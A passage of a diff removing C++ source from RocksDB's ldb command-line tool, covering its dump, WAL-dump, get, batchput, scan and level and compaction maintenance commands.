-  if (itr != options.end()) {
-    try {
-#if defined(CYGWIN)
-      max_keys_ = strtol(itr->second.c_str(), 0, 10);
-#else
-      max_keys_ = std::stoi(itr->second);
-#endif
-    } catch (const std::invalid_argument&) {
-      exec_state_ = LDBCommandExecuteResult::Failed(ARG_MAX_KEYS +
-                                                    " has an invalid value");
-    } catch (const std::out_of_range&) {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          ARG_MAX_KEYS + " has a value out-of-range");
-    }
-  }
-  itr = options.find(ARG_COUNT_DELIM);
-  if (itr != options.end()) {
-    delim_ = itr->second;
-    count_delim_ = true;
-  } else {
-    count_delim_ = IsFlagPresent(flags, ARG_COUNT_DELIM);
-    delim_=".";
-  }
-
-  print_stats_ = IsFlagPresent(flags, ARG_STATS);
-  count_only_ = IsFlagPresent(flags, ARG_COUNT_ONLY);
-
-  if (is_key_hex_) {
-    if (!null_from_) {
-      from_ = HexToString(from_);
-    }
-    if (!null_to_) {
-      to_ = HexToString(to_);
-    }
-  }
-
-  itr = options.find(ARG_PATH);
-  if (itr != options.end()) {
-    path_ = itr->second;
-  }
-}
-
-void DBDumperCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(DBDumperCommand::Name());
-  ret.append(HelpRangeCmdArgs());
-  ret.append(" [--" + ARG_TTL + "]");
-  ret.append(" [--" + ARG_MAX_KEYS + "=<N>]");
-  ret.append(" [--" + ARG_TIMESTAMP + "]");
-  ret.append(" [--" + ARG_COUNT_ONLY + "]");
-  ret.append(" [--" + ARG_COUNT_DELIM + "=<char>]");
-  ret.append(" [--" + ARG_STATS + "]");
-  ret.append(" [--" + ARG_TTL_BUCKET + "=<N>]");
-  ret.append(" [--" + ARG_TTL_START + "=<N>:- is inclusive]");
-  ret.append(" [--" + ARG_TTL_END + "=<N>:- is exclusive]");
-  ret.append(" [--" + ARG_PATH + "=<path_to_a_file>]");
-  ret.append("\n");
-}
-
-/**
- * Handles two separate cases:
- *
- * 1) --db is specified - just dump the database.
- *
- * 2) --path is specified - determine based on file extension what dumping
- *    function to call. Please note that we intentionally use the extension
- *    and avoid probing the file contents under the assumption that renaming
- *    the files is not a supported scenario.
- *
- */
-void DBDumperCommand::DoCommand() {
-  if (!db_) {
-    assert(!path_.empty());
-    std::string fileName = GetFileNameFromPath(path_);
-    uint64_t number;
-    FileType type;
-
-    exec_state_ = LDBCommandExecuteResult::Succeed("");
-
-    if (!ParseFileName(fileName, &number, &type)) {
-      exec_state_ =
-          LDBCommandExecuteResult::Failed("Can't parse file type: " + path_);
-      return;
-    }
-
-    switch (type) {
-      case kLogFile:
-        DumpWalFile(path_, /* print_header_ */ true, /* print_values_ */ true,
-                    &exec_state_);
-        break;
-      case kTableFile:
-        DumpSstFile(path_, is_key_hex_, /* show_properties */ true);
-        break;
-      case kDescriptorFile:
-        DumpManifestFile(path_, /* verbose_ */ false, is_key_hex_,
-                         /*  json_ */ false);
-        break;
-      default:
-        exec_state_ = LDBCommandExecuteResult::Failed(
-            "File type not supported: " + path_);
-        break;
-    }
-
-  } else {
-    DoDumpCommand();
-  }
-}
-
-void DBDumperCommand::DoDumpCommand() {
-  assert(nullptr != db_);
-  assert(path_.empty());
-
-  // Parse command line args
-  uint64_t count = 0;
-  if (print_stats_) {
-    std::string stats;
-    if (db_->GetProperty("rocksdb.stats", &stats)) {
-      fprintf(stdout, "%s\n", stats.c_str());
-    }
-  }
-
-  // Setup key iterator
-  Iterator* iter = db_->NewIterator(ReadOptions(), GetCfHandle());
-  Status st = iter->status();
-  if (!st.ok()) {
-    exec_state_ =
-        LDBCommandExecuteResult::Failed("Iterator error." + st.ToString());
-  }
-
-  if (!null_from_) {
-    iter->Seek(from_);
-  } else {
-    iter->SeekToFirst();
-  }
-
-  int max_keys = max_keys_;
-  int ttl_start;
-  if (!ParseIntOption(option_map_, ARG_TTL_START, ttl_start, exec_state_)) {
-    ttl_start = DBWithTTLImpl::kMinTimestamp;  // TTL introduction time
-  }
-  int ttl_end;
-  if (!ParseIntOption(option_map_, ARG_TTL_END, ttl_end, exec_state_)) {
-    ttl_end = DBWithTTLImpl::kMaxTimestamp;  // Max time allowed by TTL feature
-  }
-  if (ttl_end < ttl_start) {
-    fprintf(stderr, "Error: End time can't be less than start time\n");
-    delete iter;
-    return;
-  }
-  int time_range = ttl_end - ttl_start;
-  int bucket_size;
-  if (!ParseIntOption(option_map_, ARG_TTL_BUCKET, bucket_size, exec_state_) ||
-      bucket_size <= 0) {
-    bucket_size = time_range; // Will have just 1 bucket by default
-  }
-  //cretaing variables for row count of each type
-  std::string rtype1, rtype2, row, val;
-  rtype2 = "";
-  uint64_t c=0;
-  uint64_t s1=0,s2=0;
-
-  // At this point, bucket_size=0 => time_range=0
-  int num_buckets = (bucket_size >= time_range)
-                        ? 1
-                        : ((time_range + bucket_size - 1) / bucket_size);
-  std::vector<uint64_t> bucket_counts(num_buckets, 0);
-  if (is_db_ttl_ && !count_only_ && timestamp_ && !count_delim_) {
-    fprintf(stdout, "Dumping key-values from %s to %s\n",
-            ReadableTime(ttl_start).c_str(), ReadableTime(ttl_end).c_str());
-  }
-
-  for (; iter->Valid(); iter->Next()) {
-    int rawtime = 0;
-    // If end marker was specified, we stop before it
-    if (!null_to_ && (iter->key().ToString() >= to_))
-      break;
-    // Terminate if maximum number of keys have been dumped
-    if (max_keys == 0)
-      break;
-    if (is_db_ttl_) {
-      TtlIterator* it_ttl = static_cast_with_check<TtlIterator, Iterator>(iter);
-      rawtime = it_ttl->timestamp();
-      if (rawtime < ttl_start || rawtime >= ttl_end) {
-        continue;
-      }
-    }
-    if (max_keys > 0) {
-      --max_keys;
-    }
-    if (is_db_ttl_ && num_buckets > 1) {
-      IncBucketCounts(bucket_counts, ttl_start, time_range, bucket_size,
-                      rawtime, num_buckets);
-    }
-    ++count;
-    if (count_delim_) {
-      rtype1 = "";
-      row = iter->key().ToString();
-      val = iter->value().ToString();
-      s1 = row.size()+val.size();
-      for(int j=0;row[j]!=delim_[0] && row[j]!='\0';j++)
-        rtype1+=row[j];
-      if(rtype2.compare("") && rtype2.compare(rtype1)!=0) {
-        fprintf(stdout,"%s => count:%lld\tsize:%lld\n",rtype2.c_str(),
-            (long long )c,(long long)s2);
-        c=1;
-        s2=s1;
-        rtype2 = rtype1;
-      } else {
-          c++;
-          s2+=s1;
-          rtype2=rtype1;
-      }
-
-    }
-
-
-
-    if (!count_only_ && !count_delim_) {
-      if (is_db_ttl_ && timestamp_) {
-        fprintf(stdout, "%s ", ReadableTime(rawtime).c_str());
-      }
-      std::string str =
-          PrintKeyValue(iter->key().ToString(), iter->value().ToString(),
-                        is_key_hex_, is_value_hex_);
-      fprintf(stdout, "%s\n", str.c_str());
-    }
-  }
-
-  if (num_buckets > 1 && is_db_ttl_) {
-    PrintBucketCounts(bucket_counts, ttl_start, ttl_end, bucket_size,
-                      num_buckets);
-  } else if(count_delim_) {
-    fprintf(stdout,"%s => count:%lld\tsize:%lld\n",rtype2.c_str(),
-        (long long )c,(long long)s2);
-  } else {
-    fprintf(stdout, "Keys in range: %lld\n", (long long) count);
-  }
-  // Clean up
-  delete iter;
-}
-
-const std::string ReduceDBLevelsCommand::ARG_NEW_LEVELS = "new_levels";
-const std::string ReduceDBLevelsCommand::ARG_PRINT_OLD_LEVELS =
-    "print_old_levels";
-
-ReduceDBLevelsCommand::ReduceDBLevelsCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false,
-                 BuildCmdLineOptions({ARG_NEW_LEVELS, ARG_PRINT_OLD_LEVELS})),
-      old_levels_(1 << 7),
-      new_levels_(-1),
-      print_old_levels_(false) {
-  ParseIntOption(option_map_, ARG_NEW_LEVELS, new_levels_, exec_state_);
-  print_old_levels_ = IsFlagPresent(flags, ARG_PRINT_OLD_LEVELS);
-
-  if(new_levels_ <= 0) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        " Use --" + ARG_NEW_LEVELS + " to specify a new level number\n");
-  }
-}
-
-std::vector<std::string> ReduceDBLevelsCommand::PrepareArgs(
-    const std::string& db_path, int new_levels, bool print_old_level) {
-  std::vector<std::string> ret;
-  ret.push_back("reduce_levels");
-  ret.push_back("--" + ARG_DB + "=" + db_path);
-  ret.push_back("--" + ARG_NEW_LEVELS + "=" + rocksdb::ToString(new_levels));
-  if(print_old_level) {
-    ret.push_back("--" + ARG_PRINT_OLD_LEVELS);
-  }
-  return ret;
-}
-
-void ReduceDBLevelsCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(ReduceDBLevelsCommand::Name());
-  ret.append(" --" + ARG_NEW_LEVELS + "=<New number of levels>");
-  ret.append(" [--" + ARG_PRINT_OLD_LEVELS + "]");
-  ret.append("\n");
-}
-
-Options ReduceDBLevelsCommand::PrepareOptionsForOpenDB() {
-  Options opt = LDBCommand::PrepareOptionsForOpenDB();
-  opt.num_levels = old_levels_;
-  opt.max_bytes_for_level_multiplier_additional.resize(opt.num_levels, 1);
-  // Disable size compaction
-  opt.max_bytes_for_level_base = 1ULL << 50;
-  opt.max_bytes_for_level_multiplier = 1;
-  return opt;
-}
-
-Status ReduceDBLevelsCommand::GetOldNumOfLevels(Options& opt,
-    int* levels) {
-  ImmutableDBOptions db_options(opt);
-  EnvOptions soptions;
-  std::shared_ptr<Cache> tc(
-      NewLRUCache(opt.max_open_files - 10, opt.table_cache_numshardbits));
-  const InternalKeyComparator cmp(opt.comparator);
-  WriteController wc(opt.delayed_write_rate);
-  WriteBufferManager wb(opt.db_write_buffer_size);
-  VersionSet versions(db_path_, &db_options, soptions, tc.get(), &wb, &wc);
-  std::vector<ColumnFamilyDescriptor> dummy;
-  ColumnFamilyDescriptor dummy_descriptor(kDefaultColumnFamilyName,
-                                          ColumnFamilyOptions(opt));
-  dummy.push_back(dummy_descriptor);
-  // We rely the VersionSet::Recover to tell us the internal data structures
-  // in the db. And the Recover() should never do any change
-  // (like LogAndApply) to the manifest file.
-  Status st = versions.Recover(dummy);
-  if (!st.ok()) {
-    return st;
-  }
-  int max = -1;
-  auto default_cfd = versions.GetColumnFamilySet()->GetDefault();
-  for (int i = 0; i < default_cfd->NumberLevels(); i++) {
-    if (default_cfd->current()->storage_info()->NumLevelFiles(i)) {
-      max = i;
-    }
-  }
-
-  *levels = max + 1;
-  return st;
-}
-
-void ReduceDBLevelsCommand::DoCommand() {
-  if (new_levels_ <= 1) {
-    exec_state_ =
-        LDBCommandExecuteResult::Failed("Invalid number of levels.\n");
-    return;
-  }
-
-  Status st;
-  Options opt = PrepareOptionsForOpenDB();
-  int old_level_num = -1;
-  st = GetOldNumOfLevels(opt, &old_level_num);
-  if (!st.ok()) {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-    return;
-  }
-
-  if (print_old_levels_) {
-    fprintf(stdout, "The old number of levels in use is %d\n", old_level_num);
-  }
-
-  if (old_level_num <= new_levels_) {
-    return;
-  }
-
-  old_levels_ = old_level_num;
-
-  OpenDB();
-  if (exec_state_.IsFailed()) {
-    return;
-  }
-  // Compact the whole DB to put all files to the highest level.
-  fprintf(stdout, "Compacting the db...\n");
-  db_->CompactRange(CompactRangeOptions(), GetCfHandle(), nullptr, nullptr);
-  CloseDB();
-
-  EnvOptions soptions;
-  st = VersionSet::ReduceNumberOfLevels(db_path_, &opt, soptions, new_levels_);
-  if (!st.ok()) {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-    return;
-  }
-}
-
-const std::string ChangeCompactionStyleCommand::ARG_OLD_COMPACTION_STYLE =
-    "old_compaction_style";
-const std::string ChangeCompactionStyleCommand::ARG_NEW_COMPACTION_STYLE =
-    "new_compaction_style";
-
-ChangeCompactionStyleCommand::ChangeCompactionStyleCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false,
-                 BuildCmdLineOptions(
-                     {ARG_OLD_COMPACTION_STYLE, ARG_NEW_COMPACTION_STYLE})),
-      old_compaction_style_(-1),
-      new_compaction_style_(-1) {
-  ParseIntOption(option_map_, ARG_OLD_COMPACTION_STYLE, old_compaction_style_,
-    exec_state_);
-  if (old_compaction_style_ != kCompactionStyleLevel &&
-     old_compaction_style_ != kCompactionStyleUniversal) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "Use --" + ARG_OLD_COMPACTION_STYLE + " to specify old compaction " +
-        "style. Check ldb help for proper compaction style value.\n");
-    return;
-  }
-
-  ParseIntOption(option_map_, ARG_NEW_COMPACTION_STYLE, new_compaction_style_,
-    exec_state_);
-  if (new_compaction_style_ != kCompactionStyleLevel &&
-     new_compaction_style_ != kCompactionStyleUniversal) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "Use --" + ARG_NEW_COMPACTION_STYLE + " to specify new compaction " +
-        "style. Check ldb help for proper compaction style value.\n");
-    return;
-  }
-
-  if (new_compaction_style_ == old_compaction_style_) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "Old compaction style is the same as new compaction style. "
-        "Nothing to do.\n");
-    return;
-  }
-
-  if (old_compaction_style_ == kCompactionStyleUniversal &&
-      new_compaction_style_ == kCompactionStyleLevel) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "Convert from universal compaction to level compaction. "
-        "Nothing to do.\n");
-    return;
-  }
-}
-
-void ChangeCompactionStyleCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(ChangeCompactionStyleCommand::Name());
-  ret.append(" --" + ARG_OLD_COMPACTION_STYLE + "=<Old compaction style: 0 " +
-             "for level compaction, 1 for universal compaction>");
-  ret.append(" --" + ARG_NEW_COMPACTION_STYLE + "=<New compaction style: 0 " +
-             "for level compaction, 1 for universal compaction>");
-  ret.append("\n");
-}
-
-Options ChangeCompactionStyleCommand::PrepareOptionsForOpenDB() {
-  Options opt = LDBCommand::PrepareOptionsForOpenDB();
-
-  if (old_compaction_style_ == kCompactionStyleLevel &&
-      new_compaction_style_ == kCompactionStyleUniversal) {
-    // In order to convert from level compaction to universal compaction, we
-    // need to compact all data into a single file and move it to level 0.
-    opt.disable_auto_compactions = true;
-    opt.target_file_size_base = INT_MAX;
-    opt.target_file_size_multiplier = 1;
-    opt.max_bytes_for_level_base = INT_MAX;
-    opt.max_bytes_for_level_multiplier = 1;
-  }
-
-  return opt;
-}
-
-void ChangeCompactionStyleCommand::DoCommand() {
-  // print db stats before we have made any change
-  std::string property;
-  std::string files_per_level;
-  for (int i = 0; i < db_->NumberLevels(GetCfHandle()); i++) {
-    db_->GetProperty(GetCfHandle(),
-                     "rocksdb.num-files-at-level" + NumberToString(i),
-                     &property);
-
-    // format print string
-    char buf[100];
-    snprintf(buf, sizeof(buf), "%s%s", (i ? "," : ""), property.c_str());
-    files_per_level += buf;
-  }
-  fprintf(stdout, "files per level before compaction: %s\n",
-          files_per_level.c_str());
-
-  // manual compact into a single file and move the file to level 0
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 0;
-  db_->CompactRange(compact_options, GetCfHandle(), nullptr, nullptr);
-
-  // verify compaction result
-  files_per_level = "";
-  int num_files = 0;
-  for (int i = 0; i < db_->NumberLevels(GetCfHandle()); i++) {
-    db_->GetProperty(GetCfHandle(),
-                     "rocksdb.num-files-at-level" + NumberToString(i),
-                     &property);
-
-    // format print string
-    char buf[100];
-    snprintf(buf, sizeof(buf), "%s%s", (i ? "," : ""), property.c_str());
-    files_per_level += buf;
-
-    num_files = atoi(property.c_str());
-
-    // level 0 should have only 1 file
-    if (i == 0 && num_files != 1) {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          "Number of db files at "
-          "level 0 after compaction is " +
-          ToString(num_files) + ", not 1.\n");
-      return;
-    }
-    // other levels should have no file
-    if (i > 0 && num_files != 0) {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          "Number of db files at "
-          "level " +
-          ToString(i) + " after compaction is " + ToString(num_files) +
-          ", not 0.\n");
-      return;
-    }
-  }
-
-  fprintf(stdout, "files per level after compaction: %s\n",
-          files_per_level.c_str());
-}
-
-// ----------------------------------------------------------------------------
-
-namespace {
-
-struct StdErrReporter : public log::Reader::Reporter {
-  virtual void Corruption(size_t bytes, const Status& s) override {
-    std::cerr << "Corruption detected in log file " << s.ToString() << "\n";
-  }
-};
-
-class InMemoryHandler : public WriteBatch::Handler {
- public:
-  InMemoryHandler(std::stringstream& row, bool print_values)
-      : Handler(), row_(row) {
-    print_values_ = print_values;
-  }
-
-  void commonPutMerge(const Slice& key, const Slice& value) {
-    std::string k = LDBCommand::StringToHex(key.ToString());
-    if (print_values_) {
-      std::string v = LDBCommand::StringToHex(value.ToString());
-      row_ << k << " : ";
-      row_ << v << " ";
-    } else {
-      row_ << k << " ";
-    }
-  }
-
-  virtual Status PutCF(uint32_t cf, const Slice& key,
-                       const Slice& value) override {
-    row_ << "PUT(" << cf << ") : ";
-    commonPutMerge(key, value);
-    return Status::OK();
-  }
-
-  virtual Status MergeCF(uint32_t cf, const Slice& key,
-                         const Slice& value) override {
-    row_ << "MERGE(" << cf << ") : ";
-    commonPutMerge(key, value);
-    return Status::OK();
-  }
-
-  virtual Status DeleteCF(uint32_t cf, const Slice& key) override {
-    row_ << "DELETE(" << cf << ") : ";
-    row_ << LDBCommand::StringToHex(key.ToString()) << " ";
-    return Status::OK();
-  }
-
-  virtual Status SingleDeleteCF(uint32_t cf, const Slice& key) override {
-    row_ << "SINGLE_DELETE(" << cf << ") : ";
-    row_ << LDBCommand::StringToHex(key.ToString()) << " ";
-    return Status::OK();
-  }
-
-  virtual Status DeleteRangeCF(uint32_t cf, const Slice& begin_key,
-                               const Slice& end_key) override {
-    row_ << "DELETE_RANGE(" << cf << ") : ";
-    row_ << LDBCommand::StringToHex(begin_key.ToString()) << " ";
-    row_ << LDBCommand::StringToHex(end_key.ToString()) << " ";
-    return Status::OK();
-  }
-
-  virtual Status MarkBeginPrepare() override {
-    row_ << "BEGIN_PREARE ";
-    return Status::OK();
-  }
-
-  virtual Status MarkEndPrepare(const Slice& xid) override {
-    row_ << "END_PREPARE(";
-    row_ << LDBCommand::StringToHex(xid.ToString()) << ") ";
-    return Status::OK();
-  }
-
-  virtual Status MarkRollback(const Slice& xid) override {
-    row_ << "ROLLBACK(";
-    row_ << LDBCommand::StringToHex(xid.ToString()) << ") ";
-    return Status::OK();
-  }
-
-  virtual Status MarkCommit(const Slice& xid) override {
-    row_ << "COMMIT(";
-    row_ << LDBCommand::StringToHex(xid.ToString()) << ") ";
-    return Status::OK();
-  }
-
-  virtual ~InMemoryHandler() {}
-
- private:
-  std::stringstream& row_;
-  bool print_values_;
-};
-
-void DumpWalFile(std::string wal_file, bool print_header, bool print_values,
-                 LDBCommandExecuteResult* exec_state) {
-  Env* env_ = Env::Default();
-  EnvOptions soptions;
-  unique_ptr<SequentialFileReader> wal_file_reader;
-
-  Status status;
-  {
-    unique_ptr<SequentialFile> file;
-    status = env_->NewSequentialFile(wal_file, &file, soptions);
-    if (status.ok()) {
-      wal_file_reader.reset(new SequentialFileReader(std::move(file)));
-    }
-  }
-  if (!status.ok()) {
-    if (exec_state) {
-      *exec_state = LDBCommandExecuteResult::Failed("Failed to open WAL file " +
-                                                    status.ToString());
-    } else {
-      std::cerr << "Error: Failed to open WAL file " << status.ToString()
-                << std::endl;
-    }
-  } else {
-    StdErrReporter reporter;
-    uint64_t log_number;
-    FileType type;
-
-    // we need the log number, but ParseFilename expects dbname/NNN.log.
-    std::string sanitized = wal_file;
-    size_t lastslash = sanitized.rfind('/');
-    if (lastslash != std::string::npos)
-      sanitized = sanitized.substr(lastslash + 1);
-    if (!ParseFileName(sanitized, &log_number, &type)) {
-      // bogus input, carry on as best we can
-      log_number = 0;
-    }
-    DBOptions db_options;
-    log::Reader reader(db_options.info_log, std::move(wal_file_reader),
-                       &reporter, true, 0, log_number);
-    std::string scratch;
-    WriteBatch batch;
-    Slice record;
-    std::stringstream row;
-    if (print_header) {
-      std::cout << "Sequence,Count,ByteSize,Physical Offset,Key(s)";
-      if (print_values) {
-        std::cout << " : value ";
-      }
-      std::cout << "\n";
-    }
-    while (reader.ReadRecord(&record, &scratch)) {
-      row.str("");
-      if (record.size() < WriteBatchInternal::kHeader) {
-        reporter.Corruption(record.size(),
-                            Status::Corruption("log record too small"));
-      } else {
-        WriteBatchInternal::SetContents(&batch, record);
-        row << WriteBatchInternal::Sequence(&batch) << ",";
-        row << WriteBatchInternal::Count(&batch) << ",";
-        row << WriteBatchInternal::ByteSize(&batch) << ",";
-        row << reader.LastRecordOffset() << ",";
-        InMemoryHandler handler(row, print_values);
-        batch.Iterate(&handler);
-        row << "\n";
-      }
-      std::cout << row.str();
-    }
-  }
-}
-
-}  // namespace
-
-const std::string WALDumperCommand::ARG_WAL_FILE = "walfile";
-const std::string WALDumperCommand::ARG_PRINT_VALUE = "print_value";
-const std::string WALDumperCommand::ARG_PRINT_HEADER = "header";
-
-WALDumperCommand::WALDumperCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, true,
-                 BuildCmdLineOptions(
-                     {ARG_WAL_FILE, ARG_PRINT_HEADER, ARG_PRINT_VALUE})),
-      print_header_(false),
-      print_values_(false) {
-  wal_file_.clear();
-
-  std::map<std::string, std::string>::const_iterator itr =
-      options.find(ARG_WAL_FILE);
-  if (itr != options.end()) {
-    wal_file_ = itr->second;
-  }
-
-
-  print_header_ = IsFlagPresent(flags, ARG_PRINT_HEADER);
-  print_values_ = IsFlagPresent(flags, ARG_PRINT_VALUE);
-  if (wal_file_.empty()) {
-    exec_state_ = LDBCommandExecuteResult::Failed("Argument " + ARG_WAL_FILE +
-                                                  " must be specified.");
-  }
-}
-
-void WALDumperCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(WALDumperCommand::Name());
-  ret.append(" --" + ARG_WAL_FILE + "=<write_ahead_log_file_path>");
-  ret.append(" [--" + ARG_PRINT_HEADER + "] ");
-  ret.append(" [--" + ARG_PRINT_VALUE + "] ");
-  ret.append("\n");
-}
-
-void WALDumperCommand::DoCommand() {
-  DumpWalFile(wal_file_, print_header_, print_values_, &exec_state_);
-}
-
-// ----------------------------------------------------------------------------
-
-GetCommand::GetCommand(const std::vector<std::string>& params,
-                       const std::map<std::string, std::string>& options,
-                       const std::vector<std::string>& flags)
-    : LDBCommand(
-          options, flags, true,
-          BuildCmdLineOptions({ARG_TTL, ARG_HEX, ARG_KEY_HEX, ARG_VALUE_HEX})) {
-  if (params.size() != 1) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "<key> must be specified for the get command");
-  } else {
-    key_ = params.at(0);
-  }
-
-  if (is_key_hex_) {
-    key_ = HexToString(key_);
-  }
-}
-
-void GetCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(GetCommand::Name());
-  ret.append(" <key>");
-  ret.append(" [--" + ARG_TTL + "]");
-  ret.append("\n");
-}
-
-void GetCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-  std::string value;
-  Status st = db_->Get(ReadOptions(), GetCfHandle(), key_, &value);
-  if (st.ok()) {
-    fprintf(stdout, "%s\n",
-              (is_value_hex_ ? StringToHex(value) : value).c_str());
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-  }
-}
-
-// ----------------------------------------------------------------------------
-
-ApproxSizeCommand::ApproxSizeCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, true,
-                 BuildCmdLineOptions(
-                     {ARG_HEX, ARG_KEY_HEX, ARG_VALUE_HEX, ARG_FROM, ARG_TO})) {
-  if (options.find(ARG_FROM) != options.end()) {
-    start_key_ = options.find(ARG_FROM)->second;
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        ARG_FROM + " must be specified for approxsize command");
-    return;
-  }
-
-  if (options.find(ARG_TO) != options.end()) {
-    end_key_ = options.find(ARG_TO)->second;
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        ARG_TO + " must be specified for approxsize command");
-    return;
-  }
-
-  if (is_key_hex_) {
-    start_key_ = HexToString(start_key_);
-    end_key_ = HexToString(end_key_);
-  }
-}
-
-void ApproxSizeCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(ApproxSizeCommand::Name());
-  ret.append(HelpRangeCmdArgs());
-  ret.append("\n");
-}
-
-void ApproxSizeCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-  Range ranges[1];
-  ranges[0] = Range(start_key_, end_key_);
-  uint64_t sizes[1];
-  db_->GetApproximateSizes(GetCfHandle(), ranges, 1, sizes);
-  fprintf(stdout, "%lu\n", (unsigned long)sizes[0]);
-  /* Weird that GetApproximateSizes() returns void, although documentation
-   * says that it returns a Status object.
-  if (!st.ok()) {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-  }
-  */
-}
-
-// ----------------------------------------------------------------------------
-
-BatchPutCommand::BatchPutCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false,
-                 BuildCmdLineOptions({ARG_TTL, ARG_HEX, ARG_KEY_HEX,
-                                      ARG_VALUE_HEX, ARG_CREATE_IF_MISSING})) {
-  if (params.size() < 2) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "At least one <key> <value> pair must be specified batchput.");
-  } else if (params.size() % 2 != 0) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "Equal number of <key>s and <value>s must be specified for batchput.");
-  } else {
-    for (size_t i = 0; i < params.size(); i += 2) {
-      std::string key = params.at(i);
-      std::string value = params.at(i + 1);
-      key_values_.push_back(std::pair<std::string, std::string>(
-          is_key_hex_ ? HexToString(key) : key,
-          is_value_hex_ ? HexToString(value) : value));
-    }
-  }
-  create_if_missing_ = IsFlagPresent(flags_, ARG_CREATE_IF_MISSING);
-}
-
-void BatchPutCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(BatchPutCommand::Name());
-  ret.append(" <key> <value> [<key> <value>] [..]");
-  ret.append(" [--" + ARG_TTL + "]");
-  ret.append("\n");
-}
-
-void BatchPutCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-  WriteBatch batch;
-
-  for (std::vector<std::pair<std::string, std::string>>::const_iterator itr =
-           key_values_.begin();
-       itr != key_values_.end(); ++itr) {
-    batch.Put(GetCfHandle(), itr->first, itr->second);
-  }
-  Status st = db_->Write(WriteOptions(), &batch);
-  if (st.ok()) {
-    fprintf(stdout, "OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-  }
-}
-
-Options BatchPutCommand::PrepareOptionsForOpenDB() {
-  Options opt = LDBCommand::PrepareOptionsForOpenDB();
-  opt.create_if_missing = create_if_missing_;
-  return opt;
-}
-
-// ----------------------------------------------------------------------------
-
-ScanCommand::ScanCommand(const std::vector<std::string>& params,
-                         const std::map<std::string, std::string>& options,
-                         const std::vector<std::string>& flags)
-    : LDBCommand(
-          options, flags, true,
-          BuildCmdLineOptions({ARG_TTL, ARG_NO_VALUE, ARG_HEX, ARG_KEY_HEX,
-                               ARG_TO, ARG_VALUE_HEX, ARG_FROM, ARG_TIMESTAMP,
-                               ARG_MAX_KEYS, ARG_TTL_START, ARG_TTL_END})),
-      start_key_specified_(false),
-      end_key_specified_(false),
-      max_keys_scanned_(-1),
-      no_value_(false) {
-  std::map<std::string, std::string>::const_iterator itr =
-      options.find(ARG_FROM);
-  if (itr != options.end()) {
-    start_key_ = itr->second;
-    if (is_key_hex_) {
-      start_key_ = HexToString(start_key_);
-    }
-    start_key_specified_ = true;
-  }
-  itr = options.find(ARG_TO);
-  if (itr != options.end()) {
-    end_key_ = itr->second;
-    if (is_key_hex_) {
-      end_key_ = HexToString(end_key_);
-    }
-    end_key_specified_ = true;
-  }
-
-  std::vector<std::string>::const_iterator vitr =
-      std::find(flags.begin(), flags.end(), ARG_NO_VALUE);
-  if (vitr != flags.end()) {
-    no_value_ = true;
-  }
-
-  itr = options.find(ARG_MAX_KEYS);
-  if (itr != options.end()) {
-    try {
-#if defined(CYGWIN)
-      max_keys_scanned_ = strtol(itr->second.c_str(), 0, 10);
-#else
-      max_keys_scanned_ = std::stoi(itr->second);
-#endif
-    } catch (const std::invalid_argument&) {
-      exec_state_ = LDBCommandExecuteResult::Failed(ARG_MAX_KEYS +
-                                                    " has an invalid value");
-    } catch (const std::out_of_range&) {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          ARG_MAX_KEYS + " has a value out-of-range");
-    }
-  }
-}
-
-void ScanCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(ScanCommand::Name());
-  ret.append(HelpRangeCmdArgs());
-  ret.append(" [--" + ARG_TTL + "]");
-  ret.append(" [--" + ARG_TIMESTAMP + "]");
-  ret.append(" [--" + ARG_MAX_KEYS + "=<N>q] ");
-  ret.append(" [--" + ARG_TTL_START + "=<N>:- is inclusive]");
-  ret.append(" [--" + ARG_TTL_END + "=<N>:- is exclusive]");
-  ret.append(" [--" + ARG_NO_VALUE + "]");
-  ret.append("\n");
-}
-
-void ScanCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-
-  int num_keys_scanned = 0;
-  Iterator* it = db_->NewIterator(ReadOptions(), GetCfHandle());
-  if (start_key_specified_) {
-    it->Seek(start_key_);
